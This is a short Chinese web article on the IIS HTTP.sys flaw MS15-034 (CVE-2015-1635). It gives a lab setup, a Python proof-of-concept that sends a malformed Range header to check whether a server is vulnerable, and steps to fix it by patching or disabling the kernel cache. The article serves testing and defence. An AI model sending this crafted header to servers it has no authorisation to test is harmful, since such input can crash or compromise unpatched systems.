博信信息网CVE-2015-1635(MS15-034 )远程代码执行漏洞poc(Python)验证和修复(cve2015-2808)
一、 测试环境
ip: 192.168.80.200
操作系统:win2012
中间件:IIS8.5
二、 漏洞背景
漏洞详细参考如下信息:
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
三、 验证
import requests
Url = "http://192.168.80.200"
http_headers={
"Host":"irrelevant",
"Range":"bytes=0-18446744073709551615"
}
respone = requests.get(url = Url,headers = http_headers)
if str(respone.content).find("Requested Range Not Satisfiable") >= 0:
print("url: "+Url+" 存在MS15-034漏洞!")
else:
print("url: "+Url+" 未发现漏洞")
四、 防御措施
1.打补丁
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
2.临时禁用IIS内核缓存
版权声明
本文仅代表作者观点,不代表博信信息网立场。
上一篇:linux中cwd是什么 下一篇:html怎么设置边框圆角
相关文章
作者文章
- 拨号VPS需要手动换IP吗? 1年前 (2024-06-25)
- 如何搭建VPS远程拨号服务器? 1年前 (2024-06-25)
- 如何为拨号VPS搭建最佳代理? 1年前 (2024-06-25)
- 如何利用VPS进行拨号连接? 1年前 (2024-06-25)
- 日本VPS拨号动态IP:解锁网络新境界 1年前 (2024-06-25)